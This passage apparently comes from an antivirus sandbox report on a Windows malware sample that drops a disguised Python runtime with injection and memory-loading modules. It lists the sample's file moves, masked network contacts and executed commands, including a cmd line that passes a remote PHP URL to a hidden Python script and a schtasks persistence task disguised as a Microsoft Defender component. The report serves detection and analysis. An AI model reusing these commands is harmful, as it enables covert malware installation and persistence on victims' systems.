%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wintrust.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ws2_32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ws2_32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\error.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\apiproxy.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\apiproxy.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\error.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\error.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\wintrust.py
%LOCALAPPDATA%\programs\python\python318\windows\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\com.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\com.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\dbgprint.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\dbgprint.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\hooks.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\hooks.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\injection.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\injection.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pe_parse.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pe_parse.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pycompat.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pycompat.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\remotectypes.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\remotectypes.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\security.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\security.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\syswow64.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\syswow64.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\wintrust.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\wintrust.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\winsound.pyd
%LOCALAPPDATA%\programs\python\python318\_asyncio.pyd
%LOCALAPPDATA%\programs\python\python318\_bz2.pyd
%LOCALAPPDATA%\programs\python\python318\_ctypes.pyd
%LOCALAPPDATA%\programs\python\python318\_decimal.pyd
%LOCALAPPDATA%\programs\python\python318\_elementtree.pyd
%LOCALAPPDATA%\programs\python\python318\_hashlib.pyd
%LOCALAPPDATA%\programs\python\python318\_lzma.pyd
%LOCALAPPDATA%\programs\python\python318\_msi.pyd
%LOCALAPPDATA%\programs\python\python318\_multiprocessing.pyd
%LOCALAPPDATA%\programs\python\python318\_overlapped.pyd
%LOCALAPPDATA%\programs\python\python318\_queue.pyd
%LOCALAPPDATA%\programs\python\python318\_socket.pyd
%LOCALAPPDATA%\programs\python\python318\_sqlite3.pyd
%LOCALAPPDATA%\programs\python\python318\_ssl.pyd
%LOCALAPPDATA%\programs\python\python318\_uuid.pyd
%LOCALAPPDATA%\programs\python\python318\_zoneinfo.pyd

Moves the following files

from %LOCALAPPDATA%\programs\python\python318\pyarmor_runtime_005724\__pycache__\__init__.cpython-311.pyc.2012676327536 to %LOCALAPPDATA%\programs\python\python318\pyarmor_runtime_005724\__pycache__\__init__.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\__init__.cpython-311.pyc.2012677613936 to %LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\__init__.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\pefile.cpython-311.pyc.2012677613456 to %LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\pefile.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\__init__.cpython-311.pyc.2012709458096 to %LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\__init__.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\ws2_32.cpython-311.pyc.2012709458624 to %LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\ws2_32.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\oleaut32.cpython-311.pyc.2012709458448 to %LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\oleaut32.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\__init__.cpython-311.pyc.2012723993200 to %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\__init__.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\__init__.cpython-311.pyc.2012723996880 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\__init__.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\apiproxy.cpython-311.pyc.2012723998480 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\apiproxy.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\__init__.cpython-311.pyc.2012709461088 to %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\__init__.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\windef.cpython-311.pyc.2012723999920 to %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\windef.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\flag.cpython-311.pyc.2012725549520 to %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\flag.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\ntstatus.cpython-311.pyc.2012709462144 to %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\ntstatus.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winerror.cpython-311.pyc.2012709461440 to %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winerror.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winstructs.cpython-311.pyc.2012709463024 to %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winstructs.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winfuncs.cpython-311.pyc.2012725773040 to %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winfuncs.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\interfaces.cpython-311.pyc.2012725778144 to %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\interfaces.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\error.cpython-311.pyc.2012723999280 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\__pycache__\error.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pycompat.cpython-311.pyc.2012725759152 to %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pycompat.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\__init__.cpython-311.pyc.2012709469008 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\__init__.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\advapi32.cpython-311.pyc.2012676333344 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\advapi32.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cfgmgr32.cpython-311.pyc.2012725788176 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cfgmgr32.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\crypt32.cpython-311.pyc.2012750052400 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\crypt32.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cryptui.cpython-311.pyc.2012749878640 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cryptui.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dbghelp.cpython-311.pyc.2012749879280 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dbghelp.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dnsapi.cpython-311.pyc.2012745310704 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dnsapi.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\iphlpapi.cpython-311.pyc.2012725784656 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\iphlpapi.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\kernel32.cpython-311.pyc.2012725785888 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\kernel32.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ktmw32.cpython-311.pyc.2012745696560 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ktmw32.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ntdll.cpython-311.pyc.2012745698640 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ntdll.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\netapi32.cpython-311.pyc.2012742935360 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\netapi32.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ole32.cpython-311.pyc.2012745018832 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ole32.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleaut32.cpython-311.pyc.2012742927088 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleaut32.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleacc.cpython-311.pyc.2012745451760 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleacc.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\psapi.cpython-311.pyc.2012745452400 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\psapi.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\setupapi.cpython-311.pyc.2012742935712 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\setupapi.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shell32.cpython-311.pyc.2012745461360 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shell32.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shlwapi.cpython-311.pyc.2012745463920 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shlwapi.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\tdh.cpython-311.pyc.2012745465520 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\tdh.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\user32.cpython-311.pyc.2012744974704 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\user32.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\version.cpython-311.pyc.2012744985744 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\version.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\virtdisk.cpython-311.pyc.2012742932544 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\virtdisk.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wevtapi.cpython-311.pyc.2012744942576 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wevtapi.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\winhttp.cpython-311.pyc.2012744954096 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\winhttp.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wininet.cpython-311.pyc.2012744844432 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wininet.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wintrust.cpython-311.pyc.2012742940816 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wintrust.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ws2_32.cpython-311.pyc.2012744859472 to %LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ws2_32.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\__init__.cpython-311.pyc.2012725763472 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\__init__.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system.cpython-311.pyc.2012744859472 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\__init__.cpython-311.pyc.2012745882864 to %LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\__init__.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\pythonutils.cpython-311.pyc.2012745883344 to %LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\pythonutils.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\dbgprint.cpython-311.pyc.2012745884144 to %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\dbgprint.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\winutils.cpython-311.pyc.2012750875504 to %LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\winutils.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\improved_buffer.cpython-311.pyc.2012750887024 to %LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\improved_buffer.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\process.cpython-311.pyc.2012750887024 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\process.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\__init__.cpython-311.pyc.2012750972208 to %LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\__init__.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\native_function.cpython-311.pyc.2012750118592 to %LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\native_function.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x86.cpython-311.pyc.2012750117536 to %LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x86.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x64.cpython-311.pyc.2012751925952 to %LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x64.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\remotectypes.cpython-311.pyc.2012750970928 to %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\remotectypes.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\injection.cpython-311.pyc.2012751690320 to %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\injection.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\nativeutils.cpython-311.pyc.2012751932640 to %LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\nativeutils.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pe_parse.cpython-311.pyc.2012751826256 to %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pe_parse.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\hooks.cpython-311.pyc.2012751017808 to %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\hooks.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\meta.cpython-311.pyc.2012751828016 to %LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\meta.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\exception.cpython-311.pyc.2012751837776 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\exception.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\apisetmap.cpython-311.pyc.2012774880784 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\apisetmap.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\token.cpython-311.pyc.2012774885104 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\token.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\security.cpython-311.pyc.2012775028240 to %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\security.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\network.cpython-311.pyc.2012750974128 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\network.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\com.cpython-311.pyc.2012774838704 to %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\com.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\registry.cpython-311.pyc.2012773766672 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\registry.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\service.cpython-311.pyc.2012773845072 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\service.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\volume.cpython-311.pyc.2012773848432 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\volume.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\wmi.cpython-311.pyc.2012773850832 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\wmi.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\object_manager.cpython-311.pyc.2012774801536 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\object_manager.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\device_manager.cpython-311.pyc.2012774803648 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\device_manager.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\handle.cpython-311.pyc.2012774075088 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\handle.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_log.cpython-311.pyc.2012774079568 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_log.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_trace.cpython-311.pyc.2012773298096 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_trace.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\task_scheduler.cpython-311.pyc.2012770238864 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\task_scheduler.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system_module.cpython-311.pyc.2012770239920 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system_module.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\bits.cpython-311.pyc.2012773232080 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\bits.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\file.cpython-311.pyc.2012770445360 to %LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\file.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\wintrust.cpython-311.pyc.2012770447120 to %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\wintrust.cpython-311.pyc
from %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\syswow64.cpython-311.pyc.2012770449840 to %LOCALAPPDATA%\programs\python\python318\windows\__pycache__\syswow64.cpython-311.pyc

Network activity

Connects to

'po####ocesser.com':443
'co####lanets.net':443
'gy##.dev':443
'gi##ub.com':443
'x1.#.lencr.org':80
're#########ets.githubusercontent.com':443

TCP

HTTP GET requests

http://x1.#.lencr.org/

Other

'po####ocesser.com':443
'co####lanets.net':443
'gi##ub.com':443
'gy##.dev':443
're#########ets.githubusercontent.com':443

UDP

DNS ASK po####ocesser.com
DNS ASK co####lanets.net
DNS ASK gy##.dev
DNS ASK gi##ub.com
DNS ASK x1.#.lencr.org
DNS ASK re#########ets.githubusercontent.com

Miscellaneous

Searches for the following windows

ClassName: 'ConsoleWindowClass' WindowName: ''

Creates and executes the following

'%LOCALAPPDATA%\programs\python\python318\pythonw.exe' exec.py

Executes the following

'<SYSTEM32>\cmd.exe' /c "set REALTEKAUDIO=https://postprocesser.com/.well-known/pki-validation/go/cinnamonroll.php?id=8.... && pythonw.exe exec.py"
'<SYSTEM32>\cmd.exe' /C "echo %REALTEKAUDIO%"
'<SYSTEM32>\schtasks.exe' /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr \"%APPDATA%\DisplayUpdater.exe\" /rl HIGHEST /f
'<SYSTEM32>\cmd.exe' -o "%TEMP%\d924eda831568647" all
'%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe'
'<SYSTEM32>\cmd.exe' /C "echo %REALTEKAUDIO%"' (with hidden window)
'<SYSTEM32>\schtasks.exe' /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr \"%APPDATA%\DisplayUpdater.exe\" /rl HIGHEST /f' (with hidden window)
'<SYSTEM32>\cmd.exe' -o "%TEMP%\d924eda831568647" all' (with hidden window)

TECHNOLOGIES

TERMINOLOGIE

COURS ET EDU

MYTHES

Technical Information

Recommandations pour le traitement

Free trial